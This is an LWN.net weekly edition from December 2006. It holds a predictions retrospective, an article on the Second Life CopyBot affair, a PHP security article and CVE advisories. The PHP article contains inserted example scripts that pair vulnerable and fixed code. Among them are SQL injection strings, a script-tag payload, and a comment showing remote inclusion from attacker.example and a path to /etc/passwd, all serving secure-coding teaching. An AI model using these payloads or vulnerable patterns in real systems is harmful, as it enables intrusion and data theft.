A 2006 retrospective
This is the last LWN.net Weekly Edition for 2006; following our
longstanding tradition we will take the last week of the year off and
dedicate it to cleaning all of this year's unanswered mail out of our
inboxes. We wish you all a pleasant holiday season; LWN will be back on
its regular schedule on January 4.
Another LWN tradition is to review our predictions made at the beginning of
the year to see just how badly wrong your editor was this time around.
Those predictions were published in the January 4, 2006
edition, for those who wish to follow along from the source. Some of
the comments posted to the article can also be interesting to read with a
year's perspective. We'll not review every prediction made in that
article. Some of them are sufficiently obvious ("Perl 6 will not be
released," "the SCO case will drag on") or general ("the pace of kernel
development will not slow") that little review is called for. Some of the
others, however, offer some insights into how perspectives have changed
over the last year (or, perhaps, how blind your editor was back then).
The very first prediction made was that the GPLv3 process would dominate
the news. Your editor was not able to foresee, however, that the FSF would
take the license revision as an opportunity to attack DRM head-on. What
has happened over the last year, as evidenced by GPLv3 and in other places,
is that many in the community now think that we have enough weight to throw
around in support of goals beyond the simple creation of free software.
Whether the exercise of this weight
will lead to a more free society, or whether it will just make us more like
the entertainment industry (which also thinks it has plenty of weight to
use in pursuing power under copyright law) remains to be seen.
Some commenters doubted your editor's prediction that the non-free kernel
module issue would come to a head this year. But, over the course of this
year, a number of distributors swore off shipping such modules, those which
continue to embrace proprietary modules have taken a fair amount of
criticism, and the kernel developers seriously considered banning them
outright. Whether all that constitutes "coming to a head" can be debated,
but the fact remains: there is a great deal of resentment over proprietary kernel
modules and this issue will not go away anytime soon.
Your editor predicted the return of European software patents. There were
some stirrings over the year, but software patents have, for the most part,
laid low. It would be foolish to believe that they will do so forever,
though.
With regard to desktop Linux, your editor's advice was to not expect
amazing advances, but that there would be steady progress. The movement of
3D technologies onto the Linux desktop may not qualify as an "amazing
advance," but they are a big step regardless; Linux need defer to no other
system in the eye candy department. A prediction that alternatives to
OpenOffice.org would gain prominence did not really come through - but it
is worth noting that the OLPC project has gone with a lightweight version
of AbiWord.
One of the more controversial predictions said that the Fedora Project
would have to make changes to maintain its position. Over the course of
the year, Fedora abandoned the "Fedora Foundation" idea, gave up
(belatedly) on Fedora Legacy, decided to lengthen its support period, and
merged the Core and Extras distributions. The project has picked up a new
energy, renewed its longstanding dedication to free software, and looks
well poised to move forward with a stronger community focus.
Predicting that a Debian release would happen on schedule is always a
daring thing to do. Things clearly did not work out that way, but
substantial progress has been made. Debian Etch might not be that
late, in the end. Predicting Emacs releases is equally risky, and
Emacs 22 did not come out this year - but a couple of pretest releases
did.
Your editor thought that Novell would "get its act together and become a
truly successful Linux-based company." Oh well. That could yet happen,
but, after the events of 2006, few people would see it as a foregone
conclusion.
So what did your editor miss entirely? Big company moves were at the top
of the list. The idea that Novell would make a deal with Microsoft -
paying patent royalties in the process - was beyond your editor's
imagination at the time. Similarly, the notion that Oracle would try to
muscle into Linux support by repackaging Red Hat Enterprise Linux was a
surprise. Free software has reached such a level of importance that the
largest companies out there are paying attention.
Also missed was the open-sourcing of Java, though one could certainly
quibble that we have not actually seen the code yet. Perhaps your editor
should simply predict this event for 2007 and be dead-on. Seriously,
however, this event has been delayed for so long that many of us had
despaired of it ever happening. It does appear, however, that Jonathan
Schwartz has brought a new emphasis on free software to Sun's top position;
the planned release of Java under the GNU General Public License suggests
that he is serious.
In the end, the easiest prediction to make was that our community would
remain healthy, and that our software would continue to get better.
Despite our disagreements and our mistakes we are going from one strength
to the next. That helps make 2006 another pleasant year to look back on.
The 2006 Linux and free software timeline
For the ninth year in a row, the editors at LWN.net have put together a timeline
highlighting the most important events of the last twelve months.
It has been an active and interesting year - just like the ones before.
The GPLv3 process was launched - and threatened to split our community over
differing views of freedom. Software patent issues came and went. The
Linux desktop went 3D. Large companies became more involved with Linux and
free software - and not everybody is pleased with the result. Distributors
reevaluated and reworked their dealings with the community. And,
while all this was happening, the community continued to produce great code
which made all of our systems better.
This is version 1.0 of the 2006 timeline.
If you find any errors or remaining major omissions, please send them
to us at timeline@lwn.net; please do
not post errors or omissions as comments until after we have had a chance
to address them.
The development of the LWN.net Linux Timeline was supported by LWN
subscribers; if you like what you see, please consider subscribing to LWN.
This year, we are pleased to announce the return of the one big page version as well.
For the historically minded, the timelines for the previous eight years
remain available:
Second Life and Open Source
December 15, 2006
This article was contributed by Glyn Moody
When Larry Lessig
proclaimed that
"code is
law" he was talking metaphorically. But for a virtual world,
constructed entirely out of bits, it is literally true: the laws regarding
what you can and cannot do there, both legally and even physically, are
inscribed in the lines of code that implement it. In this space, then, open
source has an added significance in that it not only lays bare the engines of
creation, but it potentially allows them to be hacked.
What some of the consequences of this openness might be was shown recently in
Second Life, when the
open source project
libsecondlife
released a program called CopyBot. As its name suggests, this tool allowed copies
to be made of in-world objects - including the "avatars" that are used to
represent the residents of Second Life.
This was deeply problematic, since one of the attractions of Second Life is
that creators of digital content retain
ownership,
unlike in most other virtual worlds. Many now make a good living from this
in-world activity selling virtual items, with
some
earning tens of thousands of dollars per year. However, CopyBot raised the
spectre of people replicating content for free, rendering digital objects
valueless, and undermining the entire Second Life economy.
The person leading the libsecondlife project is Jonathan Freedman. He took
over recently after John Hurliman, the previous lead and still the main
contributor of code to the project, decided he didn't want to deal with the
public relations issues that CopyBot threw up. Freedman recalls: "he said to
me: 'I just want to code, I don't want to deal with this.'"
The libsecondlife project began six months ago, and was started by a group of
coders who "were interested in seeing a little more flexibility in what they
could do with Second Life," as Freedman explains. The idea was to create an
open source library that third parties could employ to create new Second Life
applications. To do that, the libsecondlife group started reverse-engineering
the Second Life protocols.
One by-product of this work was that they turned up security issues - "and
believe you me, they found quite a few," Freedman says - which they reported
to Linden Lab, the company behind Second Life. Partly as a result, "the way
the project had been run impressed Linden Lab, who were very happy with it,"
Freedman explains. "Back in the Second Life Community Convention in August,
they gave their unofficial
endorsement
of the libsecondlife project."
And then along came the CopyBot incident.
"It was a debugging tool," Freedman says of CopyBot. "The developer was working on the
part of the Second Life protocol that was responsible for drawing avatars. He
needed a way to verify that the data was coming correctly: what better way to
verify that than just mirroring it back" down the connection to the system and
observing the result?
Freedman emphasizes that there were safeguards built in to ensure that this
"mirroring" - copying of virtual objects - was kept within the terms of
service at the time. "You'd actually have to ask it before it would copy you,
and it would then give you a lengthy disclaimer explaining what was going on
so people could make sure that that was what they wanted. And generally people
were agreeing with that, and they'd be there for five or ten minutes dancing
with themselves."
There the story might have ended, were it not for the fact that CopyBot was
free software. "Anybody could get a copy and make use of it, and that's what
we saw happening: other people were modifying it to take out the disclaimer,
and generally shout stuff like 'I'm stealing your textures'" - the surface
elements of virtual objects.
As well as taunting victims in this way, a few of these "griefers" started
selling the modified, no-holds-barred version of CopyBot within Second Life.
Panic spread in some quarters of Second Life. Shop owners
closed
hundreds of virtual stores, afraid that their inventory would be copied
endlessly and rendered worthless. But in practice, the
damage
was minor, and the economy of Second Life continues to
grow -
not least because CopyBot itself had important limitations that were
consequences of the way Second Life operates.
Each "sim" or simulator of a portion of the virtual world in Second Life is
created on a server running Debian GNU/Linux, Apache, Squid and MySQL;
currently there are several thousand of these PC boxes. To allow for fast
response times, the virtual world is sent not as pixels or even as a mesh, but
as a series of 3D primitives - "prims". The Second Life client creates the
world by converting the stream of information about prims and their position
into a visual representation.
This means that the client has all the structural information about any object
visible to it; CopyBot works by taking that information, and replicating it.
However, in addition to the prims and the textures applied to them, more
complex objects add scripting to provide interactive behaviour that endows
Second Life with much of its richness. These scripts are run server-side, and
are not passed to the client, so CopyBot is unable to intercept them.
Nonetheless, the residents of Second Life who made money from their virtual
creations were understandably perturbed by the appearance of a piece of
software with the provocative name of CopyBot - "in retrospect it probably
could have been named something else," Freedman concedes.
At a November meeting held in-world, Second Life's creator and CEO, Philip
Rosedale,
explained
that nothing could be done about CopyBot using technical means: Second Life's
client-server architecture implied that CopyBot was not just possible but in
some sense inevitable. But he did promise other measures, including more
metadata, such as attribution and creation time-stamps, for virtual objects.
Since these would be stored server-side, and hence immutable, they would
provide clear proof of whether an object had been copied. To give this
approach some teeth, Linden Lab made
clear
that anyone who used CopyBot or something similar in a malicious
manner faced the
prospect of expulsion from Second Life.
Some remain
unhappy
with Rosedale's response, and also see the CopyBot incident as part of a
deeper malaise involving cynical hackers exploiting loopholes in the Second
Life code to grief other residents. They accuse Linden Lab of a certain
complicity because of its encouragement of the external libsecondlife project.
Perhaps that encouragement is not so surprising given Linden Lab's stated
intention [PDF - look at final slides]
to make elements of Second Life open source. "Without speaking to specific
timing or plans - and we've thought and are thinking lots and lots where there
might be exceptions to this - it seems like the best way to allow [Second
Life] to become reliable and scalable and grow," Rosedale said
recently
on the subject of opening up the code. "We've got a lot of smart people here
thinking about that." It's obviously useful to have smart people thinking
about it on the outside too - provided things don't get out of hand.
Freedman has instituted one important change in the libsecondlife project to
try to ensure that another CopyBot does not happen. "Previously, the way the
libsecondlife source tree was done was basically anybody who wants an account
can have one. That's the first thing I changed: just the
core
developers can have the accounts."
Freedman also has some clear-cut goals for the project, which will be
releasing all its code under the BSD license. "Short-term, the aim is to have
a workable third-party library that other people can make use of to interface
with Second Life. I believe that by the middle to end of December we'll have a
fairly decent third-party viewer that's comparable to the Second Life [client]
application. Longer term, ideally we'd like to see a completely open
implementation of Second Life, from the client, to the sims, to the assets -
everything."
Freedman believes "the use of open standards, if not open source, will go a
long way in the propagation of Second Life as an actual platform." This seems
to explain Linden Lab's enthusiasm for libsecondlife and patience with things
like CopyBot. At stake is the chance to help create the next online platform -
the 3D Web, sometimes known as Web 3.D.
Opening up the platform will also take some of the strain off Linden Lab:
currently, Second Life is growing at an unsustainable rate, with over a
million new members joining in the last couple of months. If users could host
their own virtual land, then Second Life could scale more gracefully. Beyond
that, open protocols would allow distinct but
interconnected
virtual worlds to be created. The technical aspects of this are the easy part;
more difficult are working out social and economic issues like making
reputation and money portable between those worlds, and legal ones - as the
CopyBot episode made all-too clear.
Glyn Moody writes about open source and virtual worlds at
opendotdotdot.
Page editor: Jonathan Corbet
Security
The state of PHP security
December 20, 2006
This article was contributed by Jake Edge.
PHP security has been much in the news lately, mostly centered around the
resignation
of Stefan Esser from the PHP Security Response Team. His stated reasons
for leaving are rather alarming, and he indicates a pattern of slow
responses to security holes within the language itself. Others, including
Zend co-CTO Zeev Suraski,
disagree
and chalk it up to a personality conflict between Esser and the rest of the
team. A recent
look at the
National Vulnerability Database (NVD)
specifically for PHP related security issues also highlights some of the
problems with PHP. It is time, it seems, to take a look at the state of PHP
security.
PHP is touted as an easy language to use to write web applications,
particularly those that use a database for storage. There is no end of
PHP tutorials available on the web that will help readers get
a web application up and running in short order. Unfortunately, many of these
tutorials completely ignore security and invite their readers to create
applications that suffer from SQL injection and other security flaws. This
example
(from the top ten results of a Google search for 'php tutorial') explains
how to update a record in a MySQL database by wrapping the values that come
in from a web form in single quotes. It also shows how to display
data in ways that allow cross-site scripting.
As described in another security page
article, the proper way to
handle database queries with
user supplied data is by using placeholders. PHP does provide ways to
do that, using the PEAR database API,
but finding information about it is non-trivial. It certainly is not
promoted by the PHP homepage, which tends
to push the included, easily abused, MySQL interface.
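The tutorial pattern described above, next to the placeholder-based form the article recommends, as an added example that is not code from the article or from the tutorial it cites. It runs against an in-memory SQLite database through PDO so that it works stand-alone; the tutorial's target was MySQL, and PDO is used here in place of the PEAR DB API the article names (PEAR DB takes the same ? placeholders through $db->query($sql, array(...))). The users table, its rows and the submitted form values are all constructed for the demonstration.

```php
<?php
// Added example, not code from the article or from the tutorial it cites.
// In-memory SQLite via PDO stands in for the tutorial's MySQL database.

function make_db() {
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, role TEXT)');
    $db->exec("INSERT INTO users VALUES (1, 'alice', 'user')");
    $db->exec("INSERT INTO users VALUES (2, 'root', 'admin')");
    return $db;
}

// The tutorial's pattern: form values quoted straight into the SQL string.
// The single quotes are no protection, because the attacker supplies a
// quote of their own and from then on controls the statement text.
function update_name_insecure(PDO $db, $id, $name) {
    $sql = "UPDATE users SET name='$name' WHERE id='$id'";
    return $db->exec($sql);
}

// Placeholders: the statement text is fixed and the values are bound
// separately, so a quote inside $name is data, not syntax.
function update_name_safe(PDO $db, $id, $name) {
    $stmt = $db->prepare('UPDATE users SET name = ? WHERE id = ?');
    $stmt->execute(array($name, $id));
    return $stmt->rowCount();
}

// Output side: the tutorial echoes database values into HTML unencoded,
// so a stored <script> in a name runs in every visitor's browser.
function render_name_insecure(array $row) {
    return "<td>{$row['name']}</td>";
}

// Encode for the HTML context; ENT_QUOTES also covers attribute values.
function render_name_safe(array $row) {
    return '<td>' . htmlspecialchars($row['name'], ENT_QUOTES, 'UTF-8') . '</td>';
}

// Constructed form submission: the name closes the quoted string, adds a
// second assignment, and comments out the real WHERE clause.
$evil_name = "x', role='admin' WHERE id='1' -- ";

$db = make_db();
update_name_insecure($db, 1, $evil_name);
$row = $db->query('SELECT name, role FROM users WHERE id = 1')->fetch(PDO::FETCH_ASSOC);
echo "insecure update: name={$row['name']} role={$row['role']}\n";   // the injected assignment took effect

$db = make_db();
update_name_safe($db, 1, $evil_name);
$row = $db->query('SELECT name, role FROM users WHERE id = 1')->fetch(PDO::FETCH_ASSOC);
echo "safe update:     name={$row['name']} role={$row['role']}\n";   // whole string stored as the name, role untouched

$xss = array('name' => '<script>alert(1)</script>');
echo render_name_insecure($xss), "\n";   // tag reaches the browser intact
echo render_name_safe($xss), "\n";       // tag arrives as text
```

Run it with the command-line interpreter (php example.php) on any build with the pdo_sqlite extension. The point to take away is that escaping is a property of the output context: the database driver does it for SQL through the placeholder, and htmlspecialchars() does it for HTML, and neither one substitutes for the other.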
Because PHP strives to be easy to use, its developers have added features
that have caused all manner of security problems. The worst offender
is the register_globals 'feature' which automatically instantiates
PHP variables from the CGI variables that are passed in a GET or POST. While
it does make it easier for programmers to access these values, it also allows
attackers to set the value for any uninitialized variable in the PHP program.
Because PHP is a dynamic language, variables do not necessarily need to be
initialized before they are used and many programs relied on that feature.
When combined with register_globals, this practice leads to easy
exploits.
register_globals has long been turned off by default in PHP, but
a huge number of applications still rely on it. Many PHP
web hosting companies turn it on because their customers demand it, but
it is very difficult to use the feature correctly. PHP can be configured to
warn about the use of uninitialized variables, but those warnings typically
end up in a log file somewhere that may not be examined frequently. It is an
extremely dubious feature, but one that PHP's creator, Rasmus Lerdorf, seems
to think should have been left on by default.
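The uninitialized-variable exploit that the two preceding paragraphs describe, as an added example and not code from the article. register_globals cannot be switched on from within a script, so a constructed $request array is imported into the global scope with extract() to stand in for what the feature does to every GET, POST and cookie variable before the script runs; the user name, password and parameter names are hypothetical. The last function is the defensive idiom applications used when they had to run on hosts with the feature enabled.

```php
<?php
// Added example, not code from the article. extract() below simulates
// register_globals=On for a constructed request; the credentials are made up.

$request = array('user' => 'guest', 'pass' => 'wrong', 'authorized' => '1');

// Vulnerable shape: $authorized is assigned only on the success path and is
// never initialised. With register_globals on, ?authorized=1 in the request
// has already created it before this code runs, so the final test passes
// without the password ever having been right.
function check_login_insecure($user, $pass) {
    global $authorized;
    if ($user === 'admin' && $pass === 'hunter2') {
        $authorized = true;
    }
    return !empty($authorized);
}

// Fixed shape: every variable is initialised before use and input is read
// from the request array, never from globals the request may have created.
function check_login_safe(array $post) {
    $authorized = false;
    $user = isset($post['user']) ? $post['user'] : '';
    $pass = isset($post['pass']) ? $post['pass'] : '';
    if ($user === 'admin' && $pass === 'hunter2') {
        $authorized = true;
    }
    return $authorized;
}

// Deployment check: ini_get() reports the directive as configured in php.ini
// (it returns false on interpreters that no longer know the directive).
function register_globals_is_on() {
    $value = strtolower((string) ini_get('register_globals'));
    return in_array($value, array('1', 'on', 'yes', 'true'), true);
}

// Idiom used by applications forced to run with the feature on: throw away
// every global that came from the request before any other code runs.
function undo_register_globals() {
    if (!register_globals_is_on()) {
        return;
    }
    foreach (array_keys(array_merge($_GET, $_POST, $_COOKIE)) as $name) {
        if ($name !== 'GLOBALS' && isset($GLOBALS[$name])) {
            unset($GLOBALS[$name]);
        }
    }
}

extract($request, EXTR_OVERWRITE);   // what register_globals does implicitly
var_dump(check_login_insecure($user, $pass));   // granted despite the wrong password
var_dump(check_login_safe($request));           // denied
var_dump(register_globals_is_on());
undo_register_globals();
```

The defensive function is only a mitigation: it removes the injected globals but cannot fix code that reads uninitialized variables, and it must run before any such code does (typically from an auto_prepend_file or the first line of the application's common include).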
Other poor design choices include the 'magic quotes' feature that gives the
illusion of removing SQL injection issues without actually providing that
protection. Another is the ability of the PHP include directive
to take a URL as its argument; attackers have abused this to have a victim's
server fetch their scripts and run them. Unfortunately, once such features
get into the language and are used, it becomes difficult to remove
them later.
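The two misfeatures named above, as an added example that is not the article's code: a numeric-context injection that magic_quotes_gpc cannot touch, and an include() whose argument comes from the request. The users table, the page names, the attacker host name and the temporary page directory are all constructed so the script runs stand-alone against in-memory SQLite; addslashes() stands in for magic_quotes_gpc, which is a php.ini-only directive (removed in PHP 5.4).

```php
<?php
// Added example, not code from the article. Table, page map and host names
// are constructed for the demonstration.

function make_db() {
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT)');
    $db->exec("INSERT INTO users VALUES (1, 'alice')");
    $db->exec("INSERT INTO users VALUES (2, 'bob')");
    return $db;
}

// magic_quotes_gpc backslash-escapes ' " \ and NUL in every incoming value.
// addslashes() does exactly that transformation on a constructed value.
function apply_magic_quotes($value) {
    return addslashes($value);
}

// Numeric context: $id is not inside quotes, so escaping quote characters
// changes nothing and a value of  0 OR 1=1  still rewrites the WHERE clause.
function names_by_id_insecure(PDO $db, $id) {
    return $db->query("SELECT name FROM users WHERE id = $id")
              ->fetchAll(PDO::FETCH_COLUMN);
}

// Bound parameter plus an explicit cast: the query shape is fixed and the
// argument is an integer whatever the request contained.
function names_by_id_safe(PDO $db, $id) {
    $stmt = $db->prepare('SELECT name FROM users WHERE id = ?');
    $stmt->execute(array((int) $id));
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

// include() accepts a URL when allow_url_fopen (and, from PHP 5.2,
// allow_url_include) is on: ?page=http://attacker.example/shell.txt makes the
// server fetch and execute the attacker's PHP. With URLs disabled it is
// still local file inclusion (?page=../../../../etc/passwd).
// Defined to show the shape; deliberately never called.
function show_page_insecure($page) {
    include $page;
}

// Fixed: the request selects a key in a fixed map, so no path is ever built
// from input; unknown keys fall back to a default page.
function show_page_safe($page, array $pages) {
    $file = isset($pages[$page]) ? $pages[$page] : $pages['home'];
    include $file;
}

$db = make_db();
$id = apply_magic_quotes('0 OR 1=1');      // no quote characters, so unchanged
print_r(names_by_id_insecure($db, $id));   // every user is returned
print_r(names_by_id_safe($db, $id));       // (int) '0 OR 1=1' is 0: nothing returned

// Constructed page directory for the include() demonstration.
$dir = sys_get_temp_dir() . '/pages_' . uniqid();
mkdir($dir);
file_put_contents("$dir/home.php", '<?php echo "home page\n";' . "\n");
$pages = array('home' => "$dir/home.php");
show_page_safe('http://attacker.example/shell.txt', $pages);   // falls back to home
unlink("$dir/home.php");
rmdir($dir);

// Deployment check: both should report off (empty string or "0").
var_dump(ini_get('allow_url_fopen'), ini_get('allow_url_include'));
```

The whitelist map is the durable fix for include(): even with allow_url_include off, a request-built path can still reach local files, and stripping "../" from input is a losing game against encoding variations.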
There are various projects to improve upon PHP security, including
Esser's Hardened-PHP, as well
as efforts, such as the
PHP Security Consortium, that seek to educate
people about writing secure PHP code. Unfortunately,
many of the open source PHP projects do not provide good examples
for budding PHP programmers to emulate; they either rely upon
various PHP misfeatures and/or they
were written by programmers without the requisite secure coding
skills.
The existence of these projects (and other similar ones) certainly
provides an indication that the security problem with PHP is
acknowledged by some. PHP proponents tend to take a 'blame the user'
approach that is reasonable in some ways, but fails to recognize some
of the inherent issues with PHP itself. If you target inexperienced
web application programmers, you can hardly be surprised that they
do not have fundamental security skills.
Security seems to fall somewhere below simplicity in the minds of the PHP
language developers; that makes it more difficult to have secure PHP
applications. Security is a hard problem and any attempt to 'dumb down'
a language is likely to run into security issues. Encouraging
amateur programmers to write web applications is unlikely to produce secure
code in any language, but by providing tutorials and examples that have glaring
security issues and by not concentrating on teaching secure coding, PHP makes
it that much worse. A great deal of useful code has been written on the
PHP platform; it would be nice to find a way to keep that code coming while
simultaneously making it more secure.
New vulnerabilities
clamav: stack overflow
Package(s): clamav
CVE #(s): CVE-2006-6481
Created: December 15, 2006
Updated: December 20, 2006
Description:
Hendrik Weimer has reported a vulnerability in ClamAV which can be
exploited by malicious people to cause a denial of service. The
vulnerability is caused by a stack overflow when scanning messages with
deeply nested multipart content; it can be exploited to crash the service
by sending specially crafted email to a vulnerable system.

dbus: denial of service
Package(s): dbus
CVE #(s): CVE-2006-6107
Created: December 15, 2006
Updated: February 12, 2007
Description:
Unspecified vulnerability in the match_rule_equal function in bus/signals.c
in D-Bus before 1.0.2 allows local applications to remove match rules for
other applications and cause a denial of service (lost process messages).

flash-player: CRLF injection vulnerability
Package(s): flash-player
CVE #(s): CVE-2006-5330
Created: December 14, 2006
Updated: December 20, 2006
Description:
Adobe Flash Player versions below 7.0.69 are vulnerable to CRLF injection.
Remote attackers can modify HTTP headers in client requests in order to
conduct HTTP request splitting attacks via CRLF sequences in arguments to
the ActionScript functions XML.addRequestHeader and XML.contentType.

gdm: format string vulnerability
Package(s): gdm
CVE #(s): CVE-2006-6105
Created: December 15, 2006
Updated: December 20, 2006
Description:
The gdmchooser program provides XDMCP (X Display Manager Control Protocol)
functionality to the GNOME Display Manager; this protocol allows a user to
interact with remote systems via the local X11 display. See this iDefense
advisory for additional information.

gnuradius: format string vulnerability
Package(s): gnuradius
CVE #(s): CVE-2006-4181
Created: December 14, 2006
Updated: December 20, 2006
Description:
GNU Radius has a format string vulnerability in the sqllog function that
may be used by an attacker for the remote execution of arbitrary code.

Mozilla stuff: multiple vulnerabilities
proftpd: stack-based buffer overflow
Package(s): proftpd
CVE #(s): CVE-2006-6563
Created: December 18, 2006
Updated: February 14, 2007
Description:
A vulnerability exists in the FTP server ProFTPD, versions up to and
including 1.3.0a. The vulnerability is caused by a stack-based buffer
overflow in the "pr_ctrls_recv_request" function of the "Controls"
feature. This is an optional feature of the ProFTPD server which is by
default disabled in OpenPKG and probably other distributions.

sql-ledger: several remote vulnerabilities
Package(s): sql-ledger
CVE #(s): CVE-2006-4244, CVE-2006-4731, CVE-2006-5872
Created: December 18, 2006
Updated: December 20, 2006
Description:
Several remote vulnerabilities have been discovered in SQL Ledger, a web
based double-entry accounting program, which may lead to the execution
of arbitrary code.

Updated vulnerabilities
apache: cross-site scripting
Package(s): apache
CVE #(s): CVE-2006-3918
Created: August 9, 2006
Updated: April 4, 2008
Description:
From the Red Hat advisory: "A bug was found in Apache where an invalid
Expect header sent to the server was returned to the user in an unescaped
error message. This could allow an attacker to perform a cross-site
scripting attack if a victim was tricked into connecting to a site and
sending a carefully crafted Expect header."

apache-mod_auth_kerb: off-by-one error
Package(s): apache-mod_auth_kerb
CVE #(s): CVE-2006-5989
Created: November 24, 2006
Updated: January 23, 2007
Description:
An off-by-one error in the der_get_oid function in mod_auth_kerb 5.0 allows
remote attackers to cause a denial of service (crash) via a crafted
Kerberos message that triggers a heap-based buffer overflow in the
component array.

avahi: sender id check
Package(s): avahi
CVE #(s): CVE-2006-5461
Created: November 13, 2006
Updated: December 20, 2006
Description:
Steve Grubb discovered that netlink messages were not being checked for
their sender identity. This could lead to local users manipulating the
Avahi service.

bind: denial of service
Package(s): bind
CVE #(s): CVE-2006-4095, CVE-2006-4096
Created: September 7, 2006
Updated: February 1, 2007
Description:
Bind has two denial of service vulnerabilities. Queries to recursive
servers for SIG records will trigger an assertion failure if more than one
RRset is returned. An INSIST failure can be triggered by sending a large
number of recursive queries.

bugzilla: multiple vulnerabilities
Package(s): bugzilla
CVE #(s): CVE-2006-5453, CVE-2006-5454, CVE-2006-5455
Created: November 10, 2006
Updated: August 28, 2007
Description:
Bugzilla has the following vulnerabilities:
Input data passed to various fields is not properly sanitized before
being passed back to users.
Users can gain unauthorized access to read attachment
descriptions while using diff mode.
HTTP GET and HTTP POST requests can be used to perform unauthorized
actions due to improper verification.
Input that is passed to showdependencygraph.cgi is not properly
sanitized before being returned to users.

busybox: insecure password generation
Package(s): busybox
CVE #(s): CVE-2006-1058
Created: May 5, 2006
Updated: May 2, 2007
Description:
The BusyBox 1.1.1 passwd command does not use a proper salt when hashing
passwords, so a brute force attack against the stored hashes could take
very little time.

bzip2: race condition and infinite loop
Package(s): bzip2
CVE #(s): CAN-2005-0953, CAN-2005-1260
Created: May 17, 2005
Updated: January 10, 2007
Description:
A race condition in bzip2 1.0.2 and earlier allows local users to modify
permissions of arbitrary files via a hard link attack on a file while it is
being decompressed, whose permissions are changed by bzip2 after the
decompression is complete. Also, specially crafted bzip2 archives may cause
an infinite loop in the decompressor.

clamav: missing sanity checks
Package(s): clamav
CVE #(s): CVE-2006-5874
Created: December 11, 2006
Updated: December 14, 2006
Description:
Stephen Gran discovered that malformed base64-encoded MIME attachments
can lead to denial of service through a null pointer dereference.

cpio: arbitrary code execution
Package(s): cpio
CVE #(s): CVE-2005-4268
Created: January 2, 2006
Updated: May 8, 2007
Description:
Richard Harms discovered that cpio did not sufficiently validate file
properties when creating archives. Files with, e.g., a very large size
caused a buffer overflow. By tricking a user or an automatic backup
system into putting a specially crafted file into a cpio archive, a
local attacker could probably exploit this to execute arbitrary code
with the privileges of the target user (which is likely root in an
automatic backup system).

Cyrus-SASL: DIGEST-MD5 pre-authentication denial of service
Package(s): cyrus-sasl
CVE #(s): CVE-2006-1721
Created: April 21, 2006
Updated: September 4, 2007
Description:
Cyrus-SASL contains an unspecified vulnerability in the DIGEST-MD5
process that could lead to a denial of service. An attacker could possibly
exploit this vulnerability by sending a specially crafted data stream to the
Cyrus-SASL server, resulting in a denial of service even if the attacker is
not able to authenticate.

dovecot: index cache file handling error
Package(s): dovecot
CVE #(s): CVE-2006-5973
Created: November 29, 2006
Updated: May 8, 2007
Description:
The dovecot IMAP server has an error in its index cache file handling code
which could be exploited by an authenticated user to execute arbitrary
code. Only servers with the (non-default) mmap_disable=yes option setting
are vulnerable.

elinks: arbitrary file access
Package(s): elinks
CVE #(s): CVE-2006-5925
Created: November 16, 2006
Updated: February 1, 2007
Description:
The elinks text-mode browser has an arbitrary file access vulnerability
in the Elinks SMB protocol handler. If a user can be tricked into
visiting a specially crafted web page, arbitrary files may be read or
written with the user's permissions.

enemies-of-carlotta: input sanitizing
Package(s): enemies-of-carlotta
CVE #(s): CVE-2006-5875
Created: December 13, 2006
Updated: December 13, 2006
Description:
It would seem that enemies-of-carlotta, a mailing list manager, does not
check email addresses before passing them to a shell.

ffmpeg: buffer overflows
Package(s): ffmpeg
CVE #(s): CVE-2006-4799, CVE-2006-4800
Created: September 14, 2006
Updated: May 28, 2007
Description:
The AVI processing code in FFmpeg has a number of buffer overflow
vulnerabilities. If an attacker can trick a user into loading a specially
crafted AVI, arbitrary code can be executed with the user's privileges.

freeradius: several vulnerabilities
Package(s): freeradius
CVE #(s): CVE-2005-4745, CVE-2005-4746
Created: August 8, 2006
Updated: April 24, 2007
Description:
Several remote vulnerabilities have been discovered in freeradius, a
high-performance RADIUS server, which may lead to SQL injection or denial
of service.

freetype: integer overflows
Package(s): freetype
CVE #(s): CVE-2006-0747, CVE-2006-1861, CVE-2006-2493, CVE-2006-2661,
CVE-2006-3467
Created: June 8, 2006
Updated: October 10, 2007
Description:
The FreeType library has several integer overflow vulnerabilities.
If a user can be tricked into installing a specially
crafted font file, arbitrary code can be executed with the privilege
of the user.

ftpd: privilege escalation
Package(s): ftpd
CVE #(s): CVE-2006-5778
Created: November 10, 2006
Updated: February 14, 2007
Description:
Ftpd is vulnerable to a privilege escalation attack: an incorrect
seteuid() call can be used by an FTP user to gain unauthorized access to
files or directories.

gcc: file overwrite vulnerability
| Package(s): | gcc |
| CVE #(s): | CVE-2006-3619 |
| Created: | September 6, 2006 |
| Updated: | March 14, 2008 |
| Description: | The fastjar utility found in the GNU compiler collection does not perform adequate file path checking, allowing the creation or overwriting of files outside of the current directory tree. |
| Alerts: | |
Comments (none posted)
gdb: buffer overflow
| Package(s): | gdb |
| CVE #(s): | CVE-2006-4146 |
| Created: | September 15, 2006 |
| Updated: | June 12, 2007 |
| Description: | A buffer overflow in dwarfread.c and dwarf2read.c debugging code in GNU Debugger (GDB) 6.5 allows user-assisted attackers, or restricted users, to execute arbitrary code via a crafted file with a location block (DW_FORM_block) that contains a large number of operations. |
| Alerts: | |
Comments (none posted)
gdm: improper file permissions
| Package(s): | gdm |
| CVE #(s): | CVE-2006-1057 |
| Created: | April 19, 2006 |
| Updated: | May 2, 2007 |
| Description: | The .ICEauthority file may be created with the wrong ownership and permissions; gdm 2.14.2 fixes the problem. |
| Alerts: | |
Comments (none posted)
gnupg: stack overwrite
| Package(s): | gnupg |
| CVE #(s): | CVE-2006-6235 |
| Created: | December 12, 2006 |
| Updated: | March 13, 2007 |
| Description: | A "stack overwrite" vulnerability in GnuPG (gpg) allows attackers to execute arbitrary code via crafted OpenPGP packets that cause GnuPG to dereference a function pointer from deallocated stack memory. |
| Alerts: | |
Comments (3 posted)
gv: stack-based buffer overflow
| Package(s): | gv |
| CVE #(s): | CVE-2006-5864 |
| Created: | November 20, 2006 |
| Updated: | April 9, 2007 |
| Description: | Stack-based buffer overflow in the ps_gettext function in ps.c for GNU gv 3.6.2, and possibly earlier versions, allows user-assisted attackers to execute arbitrary code via a PostScript (PS) file with certain headers that contain long comments, as demonstrated using the DocumentMedia header. |
| Alerts: | |
Comments (none posted)
gzip: multiple vulnerabilities
